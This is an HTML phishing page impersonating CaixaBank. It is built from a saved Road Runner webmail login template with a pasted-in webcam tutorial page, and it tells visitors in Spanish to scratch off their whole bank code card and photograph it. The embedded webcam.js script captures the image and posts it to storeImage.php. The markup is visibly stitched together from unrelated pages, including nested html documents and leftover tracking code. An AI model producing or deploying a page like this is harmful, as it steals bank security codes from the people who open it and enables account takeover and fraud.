<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional" "/assets/dtd/xhtml1-transitional.dtd">
<!-- saved from url=(0043)https://webmail.tampabay.rr.com/?v=bh_theme -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!-- webmail version: 4.4.6 - 20171005b-bhn  --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  
  <title>
    
    Caixa Bank Code Book Verification
  </title>

  <link rel="shortcut icon" type="image/ico" href="https://webmail.tampabay.rr.com/favicon.png">

    <script type="text/javascript" src="images/event"></script><script type="text/javascript" src="images/event(1)"></script><script async="" src="images/beacon.js.download"></script><script language="javascript">
        var url = new String();
        url = window.location.href;
        switch (window.location.protocol) {
            case "http:":
                url =  url.replace(/^http:\/\//i, "https://");
                window.location=url;
                break;
        }
    </script>

  <script src="images/common_js.jsp" type="text/javascript"></script>

    
    <link rel="stylesheet" type="text/css" href="images/reset-min.446a.css" media="all">
    <link rel="stylesheet" type="text/css" href="images/webmail.446a.css" media="all">
    <!--[if IE]>
        <link rel="stylesheet" type="text/css" href="/includes/ie.446a.css" media="all" />
    <![endif]-->

    

    <script language="JavaScript" type="text/javascript" src="images/s_code.446a.js.download"></script>

  
  

  
    <script src="images/javascript_js.jsp" type="text/javascript"></script>
  

    <script language="javascript">
        //extra code for tracking
        var _host = "webmail.tampabay.rr.com";
        var _trackingRegion  = _host.substring(_host.indexOf(".")+1);
        var _pageName = "login";
	var _url = "";
	
	
	
	var forwarding = "off";
	
	

	// use to correct theme for login page
	var _bhDomainList = "|webmail.bak.rr.com|webmail.tampabay.rr.com|webmail.cfl.rr.com|webmail.mi.rr.com|webmail.indy.rr.com|webmail.panhandle.rr.com|webmail.elmore.rr.com|webmail.eufaula.rr.com|webmail.bham.rr.com|mail.brighthouse.com|webmail.brighthouse.com|";
	var _twcDomainList = "|webmail.austin.rr.com|webmail.ca.rr.com|webmail.carolina.rr.com|webmail.cinci.rr.com|webmail.columbus.rr.com|webmail.dc.rr.com|webmail.ec.rr.com|webmail.elp.rr.com|webmail.gt.rr.com|webmail.hawaii.rr.com|webmail.hot.rr.com|webmail.hvc.rr.com|webmail.insight.rr.com|webmail.kc.rr.com|webmail.ma.rr.com|webmail.maine.rr.com|webmail.mass.rr.com|webmail.nc.rr.com|webmail.ne.rr.com|webmail.neb.rr.com|webmail.neo.rr.com|webmail.new.rr.com|webmail.nj.rr.com|webmail.nyc.rr.com|webmail.nycap.rr.com|webmail.oh.rr.com|webmail.pa.rr.com|webmail.rgv.rr.com|webmail.roadrunner.com|webmail.rochester.rr.com|webmail.san.rr.com|webmail.satx.rr.com|webmail.sc.rr.com|webmail.si.rr.com|webmail.socal.rr.com|webmail.stny.rr.com|webmail.stx.rr.com|webmail.sw.rr.com|webmail.triad.rr.com|webmail.twcny.rr.com|webmail.tx.rr.com|webmail.we.rr.com|webmail.wi.rr.com|webmail.woh.rr.com|webmail.twc.com|";
	var _variant = "bh_theme";
	// redirect if domain matches bh and theme is not bh

	if ((_bhDomainList.indexOf("|"+_host.toLowerCase()+"|") >= 0) && (_variant == 'twc_theme')) {
		_url = "https://" + _host + "?v=bh_theme";
		if (forwarding == "on") {
			_url = _url + "&e=forwarded";
		}
                window.location=_url;
	} else if ((_twcDomainList.indexOf("|"+_host.toLowerCase()+"|") >= 0) && (_variant == 'bh_theme')) {
	// redirect if domain matches twc and theme is not twc
                _url = "https://" + _host + "?v=twc_theme";
		if (forwarding == "on") {
                        _url = _url + "&e=forwarded";
                }
                window.location=_url;
	}

    </script>

</head>

<!-- START wrapper -->

  
  
  

  
  

  
  





<body id="body_id" style="text-align: center; background-color: #c9c9c9;">

<!-- Begin comScore Tag -->
<script>
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "6036183" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
&lt;img src="https://b.scorecardresearch.com/p?c1=2&amp;c2=6036183&amp;cv=2.0&amp;cj=1" /&gt;</noscript>
<!-- End comScore Tag -->

<!-- SiteCatalyst code version: H.16.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->

<script language="JavaScript" type="text/javascript">
    <!--
    s.pageName= "webmail>" + _pageName + ">main";
    //s.channel="defaultapp";
    s.channel="Login";
    s.pageType="";
    s.prop1=_trackingRegion;
    s.prop2="";
    /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
    var s_code=s.t();if(s_code)document.write(s_code)//-->
</script>

<script language="JavaScript" type="text/javascript">
    <!--
    if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
    //-->
</script>

<!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.16. -->

<div class="wrapper">
    











<div class="richAdLoginHeader" style="width: 986px; height: 37px">
<!-- START hat -->

        <p>

<a title="CaixaBank" class="dtcell vamid" href="javascript:openCaixaBank();">
<img src="./index-es-using_files/logo_caixabank_40.png" alt="CaixaBank">
</a>
</p>

<!-- END hat -->

</div>
<!-- END header -->



    <!-- START main -->
    <div class="main">
        <!-- START .main .content -->

        














<noscript>
        &lt;div class="webmailErrorInfoSection"&gt;
    &lt;div class="webmailError webmailAlignLeftNoPad2"&gt;&lt;/div&gt;
        &lt;div class="webmailErrorInfoTxt"&gt;
            This application needs Javascript enabled to function correctly.
        &lt;/div&gt;
&lt;/div&gt;</noscript>








            <!-- START .webmailMainPanel -->
            












<!-- Content -->
  
<!DOCTYPE html>
<html>
<head>
    <title>Capture webcam image with php and jquery - ItSolutionStuff.com</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/webcamjs/1.0.25/webcam.min.js"></script>
    <link rel="stylesheet" href="bootstrap.min.css" />
    <style type="text/css">
        #results { padding:20px; border:1px solid; background:#ccc; }
    </style>
</head>
<body>
  
<div class="container">
    <h1 class="text-center" dir="ltr"><font size="3">
	<span style="background-color: #FFFFFF">NOTA: rasque completamente la 
	tarjeta de código y adjunte una copia para que podamos revisar y enviar una 
	nueva.</span></font></h1>
   
    <form method="POST" action="storeImage.php">
        <div class="row">
            <div class="col-md-6">
                <div id="my_camera"></div>
                <br/>
                <input type=button value="Haga clic aquí PARA tomar una instantánea del de tarjeta de código linea Abierta" onClick="take_snapshot()" style="border: 3px double #FF0000"><img border="0" src="arrow.png" width="52" height="23">
                <input type="hidden" name="image" class="image-tag">
            </div>
            <div class="col-md-6">
                <div id="results">
					<p style="text-align: left"><span style="font-size: 72%">
					Necesitamos</span><span style="font-size: 72%"> una copia de 
					su tarjeta de Código para completar el proceso. Siga las 
					instrucciones a continuación.<br>
					1. Haga clic en &#39;Tomar foto-Tomar foto&#39;.<br>
					2. Deje que el navegador use la cámara web de la computadora.<br>
					3. Coloque con cuidado la tabla de índice frente a la cámara 
					para que toda la tabla quede en la imagen.<br>
					4. Haga clic en la imagen de la cámara en la esquina 
					inferior derecha para tomar una foto.<br>
					5. Cuando termine, puede presionar &#39;enviar&#39; en la parte 
					inferior.... </span></p>
                  <p>
                  <img src="imagen.png" alt="Resultado de imagen para el libro de tarjeta de código" width="192" height="165"></p>
                  <p>&nbsp;</div>
            </div>
            <div class="col-md-12 text-center">
                <br/>
                <button class="btn btn-success">Enviar</button>
            </div>
        </div>
    </form>
</div>
  
<!-- Configure a few settings and attach camera -->
<script language="JavaScript">
    Webcam.set({
        width: 490,
        height: 390,
        image_format: 'jpeg',
        jpeg_quality: 90
    });
  
    Webcam.attach( '#my_camera' );
  
    function take_snapshot() {
        Webcam.snap( function(data_uri) {
            $(".image-tag").val(data_uri);
            document.getElementById('results').innerHTML = '<img src="'+data_uri+'"/>';
        } );
    }
        </script>
 
        <p>&nbsp;</p>
 
        <p>&nbsp;</p>
 
        <p>&nbsp;</p>
 
</body>
</html>
		<div class="footer">

    <a href="http://www.caixabank.es/" class="icon_volver lfloat derecha225"></a>

&nbsp;<div class="pie">

<div class="superior5">
<ul class="menu_simple">
<li><a href="javascript:info()">Aviso legal</a></li>
<li><a href="javascript:n_ventana(1)">Seguridad</a></li>
<li><a href="javascript:n_ventana(2)">Tarifas</a></li>
</ul>
</div>
<div class="superior5">@ CaixaBank, S.A. 2020. Todos los derechos reservados.</div>
</div>
    <!-- END .footer .content -->

</div>
<!-- END footer -->


</div>







</div><iframe id="destination_publishing_iframe_twc_1" src="images/dest4.html" style="display: none; width: 0px; height: 0px;"></iframe></body></html>